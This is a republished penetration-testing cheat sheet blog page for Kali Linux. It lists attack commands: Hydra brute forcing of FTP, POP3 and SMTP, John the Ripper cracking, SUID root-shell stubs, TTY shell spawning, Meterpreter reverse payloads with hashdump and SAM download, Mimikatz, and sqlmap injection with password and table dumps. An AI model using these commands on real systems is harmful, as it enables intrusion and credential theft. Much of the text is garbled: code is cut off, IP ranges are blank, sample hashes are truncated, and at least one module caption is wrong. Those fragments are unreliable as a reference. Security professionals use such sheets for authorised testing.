KALI LINUX Penetration Testing Tools Cheat Sheet

Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test. For more in depth information I’d recommend the man file for the tool or a more specific pen testing cheat sheet from the menu on the right.


This article originally appeared on Penetration Testing Tools Cheat Sheet.

Recon and Enumeration

NMAP Commands

For more commands, see the nmap cheat sheet (link in the menu on the right).

Command Description
nmap -v -sS -A -T4 target Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p--A -T4 target As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target As above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns
--script-args=unsafe=1 192.168.1.X
Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
ls /usr/share/nmap/scripts/* | grep ftp Search nmap scripts for keywords

SMB enumeration

Also see, nbtscan cheat sheet (right hand menu).

Command Description
nbtscan Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Other Host Discovery

Other methods of host discovery, that don’t use nmap…

Command Description
netdiscover -r Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site

SMB Enumeration

Enumerate Windows shares / Samba shares.

Command Description
nbtscan Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

Python local web server command, handy for serving up shells and exploits on an attacking machine.

Command Description
python -m SimpleHTTPServer 80 Run a basic http server, great for serving up shells etc

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

Command Description
mount /mnt/nfs Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
Mount a Windows share on Windows from the command line
apt-get install smb4k -y Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic Finger Printing

Manual finger printing / banner grabbing.

Command Description
nc -v 25

telnet 25

Basic versioning / finger printing via displayed banner

SNMP Enumeration

Command Description
snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

SNMP enumeration

DNS Zone Transfers

Command Description
nslookup -> set type=any -> ls -d blah.com Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com Linux DNS zone transfer


DNS Enumeration Kali – DNSRecon


# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std –xml ouput.xml

HTTP / HTTPS Webserver Enumeration

Command Description
nikto -h Perform a nikto scan against target
dirbuster Configure via GUI, CLI input doesn’t work most of the time

Packet Inspection

Command Description
tcpdump tcp port 80 -w output.pcap -i eth0 tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

Command Description
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

Command Description
snmpwalk public -v1 192.168.X.XXX 1 |grep
|cut -d” “ -f4
Enmerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX
Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)
Search for SNMP servers with nmap, grepable output



Command Description
/usr/share/wordlists Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

Command Description
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V
Hydra FTP brute force

Hydra POP3 Brute Force

Command Description
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V
Hydra POP3 brute force

Hydra SMTP Brute Force

Command Description
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V Hydra SMTP brute force

Use -t to limit concurrent connections, example: -t 15

Password Cracking

John The Ripper – JTR

Command Description
john --wordlist=/usr/share/wordlists/rockyou.txt hashes JTR password cracking
john --format=descrypt --wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show JTR forced descrypt brute force cracking

Exploit Research

Ways to find exploits for enumerated hosts / services.

Command Description
searchsploit windows 2003 | grep -i local Search exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3 Use google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework
Search metasploit modules using grep – msf search sucks a bit

Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands

See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.

Compiling Exploits

Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

Command Description
process.h, string.h, winbase.h, windows.h, winsock2.h Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h
Linux exploit code

Build Exploit GCC

Compile exploit gcc.

Command Description
gcc -o exploit exploit.c Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

Command Description
gcc -m32 exploit.c -o exploit Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

Command Description
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe Compile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);

Building the SUID Shell binary

gcc -o suid suid.c  

For 32 bit:

gcc -m32 -o suid suid.c  

Reverse Shells

See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell


Spawn TTY Shell from Vi

Run shell commands from vi:


Spawn TTY Shell NMAP



Some basic Metasploit stuff, that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

Command Description
set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload

Windows VNC Meterpreter payload

Command Description
set payload windows/vncinject/reverse_tcp

set ViewOnly false

Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

Command Description
set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

Command Description
upload file c:\\windows Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp Meterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmp Meterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exe Meterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c Creates new channel with cmd shell
ps Meterpreter show processes
shell Meterpreter get shell on the target
getsystem Meterpreter attempts priviledge escalation the target
hashdump Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

Command Description
use exploit/windows/smb/ms08_067_netapi MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

Command Description
use exploit/windows/local/bypassuac Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

Command Description
use auxiliary/scanner/http/dir_scanner Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version Metasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module

Metasploit Powershell Modules

Command Description
use exploit/multi/script/web_delivery Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Command Description
run post/windows/gather/win_privs Metasploit show privileges of current user
use post/windows/gather/credentials/gpp Metasploit grab GPP saved passwords
load mimikatz -> wdigest Metasplit load Mimikatz
run post/windows/gather/local_admin_search_enum Idenitfy other machines that the supplied domain user has administrative access to


TTL Fingerprinting

Operating System TTL Size
Windows 128
Linux 64
Solaris 255
Cisco / Network 255


Classful IP Ranges

E.g Class A,B,C (depreciated)

Class IP Address Range
Class A IP Address Range -
Class B IP Address Range -
Class C IP Address Range -
Class D IP Address Range -
Class E IP Address Range -

IPv4 Private Address Ranges

Class Range
Class A Private Address Range -
Class B Private Address Range -
Class C Private Address Range - -

IPv4 Subnet Cheat Sheet

CIDR Decimal Mask Number of Hosts
/31 1 Host
/30 2 Hosts
/29 6 Hosts
/28 14 Hosts
/27 30 Hosts
/26 62 Hosts
/25 126 Hosts
/24 254 Hosts
/23 512 Host
/22 1022 Hosts
/21 2046 Hosts
/20 4094 Hosts
/19 8190 Hosts
/18 16382 Hosts
/17 32766 Hosts
/16 65534 Hosts
/15 131070 Hosts
/14 262142 Hosts
/13 524286 Hosts
/12 1048674 Hosts
/11 2097150 Hosts
/10 4194302 Hosts
/9 8388606 Hosts
/8 16777214 Hosts

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII Character
x00 Null Byte
x08 BS
x09 TAB
x0a LF
x0d CR
x1b ESC
x20 SPC
x21 !
x23 #
x24 $
x25 %
x26 &
x27 `
x28 (
x29 )
x2a *
x2b +
x2c ,
x2e .
x2f /
x30 0
x31 1
x32 2
x33 3
x34 4
x35 5
x36 6
x37 7
x38 8
x39 9
x3a :
x3b ;
x3c <
x3d =
x3e >
x3f ?
x40 @
x41 A
x42 B
x43 C
x44 D
x45 E
x46 F
x47 G
x48 H
x49 I
x4a J
x4b K
x4c L
x4d M
x4e N
x4f O
x50 P
x51 Q
x52 R
x53 S
x54 T
x55 U
x56 V
x57 W
x58 X
x59 Y
x5a Z
x5b [
x5c \
x5d ]
x5e ^
x5f _
x60 `
x61 a
x62 b
x63 c
x64 d
x65 e
x66 f
x67 g
x68 h
x69 i
x6a j
x6b k
x6c l
x6d m
x6e n
x6f o
x70 p
x71 q
x72 r
x73 s
x74 t
x75 u
x76 v
x77 w
x78 x
x79 y
x7a z

CISCO IOS Commands

A collection of useful Cisco IOS commands.

Command Description
enable Enters enable mode
conf t Short for, configure terminal
(config)# interface fa0/0 Configure FastEthernet 0/0
(config-if)# ip addr Add ip to fa0/0
(config-if)# ip addr Add ip to fa0/0
(config-if)# line vty 0 4 Configure vty line
(config-line)# login Cisco set telnet password
(config-line)# password YOUR-PASSWORD Set telnet password
# show running-config Show running config loaded in memory
# show startup-config Show sartup config
# show version show cisco IOS version
# show session display open sessions
# show ip interface Show network interfaces
# show interface e0 Show detailed interface info
# show ip route Show routes
# show access-lists Show access lists
# dir file systems Show available files
# dir all-filesystems File information
# dir /all SHow deleted files
# terminal length 0 No limit on terminal output
# copy running-config tftp Copys running config to tftp server
# copy running-config startup-config Copy startup-config to running-config


Hash Lengths

Hash Size
MD5 Hash Length 16 Bytes
SHA-1 Hash Length 20 Bytes
SHA-256 Hash Length 32 Bytes
SHA-512 Hash Length 64 Bytes

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

Hash Example
MD5 Hash Example 8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT Example 01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hash Example b89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256 127e6fbfe24a750e72930c220a8e138275656b
SHA-256 $PASS:$SALT c73d08de890479518ed60cf670d17faa26a4a7
SHA-256 $SALT:$PASS eb368a2dfd38b405f014118c7d9747fcc97f4
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9
SHA-512 $PASS:$SALT e5c3ede3e49fb86592fb03f471c35ba13e8
SHA-512 $SALT:$PASS 976b451818634a1e2acba682da3fd6ef
NTLM Hash Example b4b9b02e6f09a9bd760f388b67351e2b

SQLMap Examples

Command Description
sqlmap -u http://meh.com --forms --batch --crawl=10
--cookie=jsessionid=54321 --level=5 --risk=3
Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1"
--dbms=mysql --tech=U --random-agent --dump
Scan url for union + error based injection with mysql backend
and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --forms sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms
-D database-name -T users --dump
sqlmap dump and crack hashes for table users on database-name.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


IT Security Research and Services


About assembler and stuff

Astr0baby's not so random thoughts _____ rand() % 100;

ψυχῆς ἰατρεῖον "Hospital of the soul"

Penetration Testing Academy

Education and Advice for Rookies

P.M.C.S.P. Blog

Articles about Physics, Math, Computer Security & Programming and more

Chimera | Security


%d bloggers like this: